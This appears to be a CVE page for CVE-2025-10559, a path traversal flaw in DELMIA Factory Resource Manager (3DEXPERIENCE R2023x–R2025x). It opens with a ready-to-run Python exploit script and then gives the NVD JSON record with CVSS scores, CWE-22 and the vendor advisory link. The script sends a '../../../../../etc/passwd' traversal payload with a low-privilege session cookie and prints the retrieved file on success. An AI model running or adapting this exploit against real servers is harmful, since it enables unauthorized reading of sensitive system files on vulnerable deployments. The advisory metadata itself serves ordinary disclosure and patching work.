CVE-2025-10559

import requests # Target URL of the vulnerable DELMIA component target_url = "http://target-server/api/factory-resource" # Attacker controlled session cookie (Low privilege required) cookies = { "session_id": "attacker_low_privilege_session_token" } # Path traversal payload to read a sensitive file # Adjust the path based on the server OS (e.g., ../../windows/win.ini for Windows) payload = { "resource_path": "../../../../../etc/passwd" } try: # Sending the GET request with the malicious payload response = requests.get(target_url, params=payload, cookies=cookies, timeout=10) # Check if the request was successful and content is returned if response.status_code == 200 and "root:" in response.text: print("[+] Exploit successful! File content retrieved:") print(response.text) else: print(f"[-] Exploit failed or file not found. Status: {response.status_code}") print(response.text[:200]) except requests.exceptions.RequestException as e: print(f"[!] An error occurred: {e}")

{"cve": {"id": "CVE-2025-10559", "sourceIdentifier": "[email protected]", "published": "2026-03-31T09:16:21.970", "lastModified": "2026-04-06T15:17:19.867", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Path Traversal vulnerability affecting Factory Resource Management in DELMIA Factory Resource Manager from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x allows an attacker to read or write files in specific directories on the server."}, {"lang": "es", "value": "Una vulnerabilidad de salto de ruta que afecta a la Gestión de Recursos de Fábrica en DELMIA Factory Resource Manager desde la versión 3DEXPERIENCE R2023x hasta la versión 3DEXPERIENCE R2025x permite a un atacante leer o escribir archivos en directorios específicos en el servidor."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:3ds:3dexperience:*:*:*:*:*:*:*:*", "versionStartIncluding": "r2023x", "versionEndIncluding": "r2025x", "matchCriteriaId": "5D800681-01F0-43E4-9525-BE188167D292"}]}]}], "references": [{"url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10559", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}